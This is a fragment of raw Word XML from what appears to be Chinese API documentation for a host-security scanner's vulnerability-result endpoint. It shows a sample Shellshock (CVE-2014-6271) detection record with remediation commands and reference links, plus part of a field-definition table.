          <w:p w14:paraId="079EB9C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必传，作业类型：1：全局作业 2：用户作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B38819B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D10A2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/linux/result_detail</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5b8dfe107d761b471404112d","jobType":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80255C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E25F910" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042014001964",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulName": "Bash远程代码执行漏洞(CVE-2014-6271)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "apps": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "bash"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "desc": "Shellshock，又称Bashdoor，是在Unix中广泛使用的Bash shell中的一个安全漏洞，首次于2014年9月24日公开。许多互联网守护进程，如网页服务器，使用bash来处理某些命令，从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。该漏</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>洞会影响目前主流的Linux和Mac OSX操作系统平台，包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平台。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "restartOpts": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "publicDate": "2014-09-24 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "firstCheckTime": "2018-08-02 15:30:31",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "family": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "severity": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "checkInfo": "版本比对检测原理：检查当前系统中Bash版本是否在受影响版本内|版本比对检测结果：|POC检测原理：检查当前系统中Bash版本是否在受影响版本内|POC检测结果：",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pocCheckInfo": "在Bash中，以\"(){\"开头定义的环境变量在命令env中解析成函数后，Bash执行并未退出，而是继续解析并执行shell命令，从而导致漏洞产生。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "checkResult": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "data": "{\"code\": 0, \"execute_type\": 3, \"cve_id\": \"CVE-2014-0160\", \"poc_check_result\": {\"vuln\": 1, \"code\": 0, \"result\": {\"vuls\": [{\"vuln\": 1, \"key\": \"fake value\"}]}, \"error\": null}, \"host_id\": \"86e354eb10f147f2\", \"ver_check_result\": {\"vuln\": 1, \"code\": 0, \"result\": {\"vuls\": [{\"vuln\": 1, \"version\": \"1.0.1e-fips\", \"home\": \"/etc/pki/tls\"}]}, \"error\": null}}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remedDescription": "升级bash到最新版本，漏洞修复后需要重启bash服务，建议业务不繁忙时修复。使用以下命令升级：   \r\nRHEL/CentOS : sudo yum update -y bash \r\nUbuntu : sudo apt-get update &amp;&amp; sudo apt-get install --only-upgrade -y bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "kernel": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remote": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "localEscalation": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hasExp": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hasPoc": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "cvss": "AV:N/AC:L/Au:N/C:C/I:C/A:C",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "cvssScore": 10,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "refs": "CNVD-2014-06345,BID-70103",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "expRefs": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pocRefs": "https://www.exploit-db.com/exploits/34879/ \r\nhttps://www.exploit-db.com/exploits/37816/ \r\nhttps://www.exploit-db.com/exploits/38849/ \r\nhttps://www.exploit-db.com/exploits/39918/ \r\nhttps://www.exploit-db.com/exploits/40619/ \r\nhttps://www.exploit-db.com/exploits/40938/ \r\nhttps://www.exploit-db.com/exploits/42938/\r\nhttps://www.exploit-db.com/exploits/36609/\r\nhttps://www.exploit-db.com/exploits/36503/\r\nhttps://www.exploit-db.com/exploits/36504/\r\nhttps://www.exploit-db.com/exploits/35146/\r\nhttps://www.exploit-db.com/exploits/35115/\r\nhttps://www.exploit-db.com/exploits/34766/\r\nhttps://www.exploit-db.com/exploits/34765/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "cves": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "CVE-2014-6271"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "condition": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "appVersion": "bash＜4.3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pocCheckResults": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "executeType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "checkResult": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "executeType": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "checkResult": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "d27260c9bb52d82c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "yongliang"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D0AEF6"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910"/>
        <w:gridCol w:w="1071"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5556"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2263FAB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DD4C62B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C33F4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B606B74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D070BFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="57A17BDD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="709650D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A731F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163410D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6675FE16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险id（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E3F232C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6919C05F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BF5FCB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46ECCA27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05141390" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险名（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18E46BB8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0735411B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="210F4E80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="634345FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E0CB4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>影响的应用（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18301B68" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E053967" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>desc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7977E9CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08513EF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FE8FC9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73FF0D47" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08982EBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5145C6DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CEA69E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47ED41B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复影响：0-未知；1-无需重启；2-服务重启；3系统重启 （仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="294B9BEF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AAD4A0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>publicDate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04FE352F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="274AED7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0085D511" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发布时间（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CD0BEAE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54A9E07D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1415F763" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C05633" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B7B612" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>首次检测时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E2410BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F3019DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="135D087B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="731B1E50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7266D5C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险类型，对于漏洞检测固定为4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68DD3273" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78A29CE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1169B145" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC260D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2209B122" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>危险程度：0-信息；1-低危；2-中危；3-高危；4-危急 ）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CFD0359" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08E56276" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62FF05EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C937D16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713297F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3563B82B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517649B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pocCheckInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F6F042" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="396BFAB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E7DA65A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POC检测信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="34D734B2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D9D0BA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CD420AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F5F94B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47697C6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A7675DB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0D5500" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
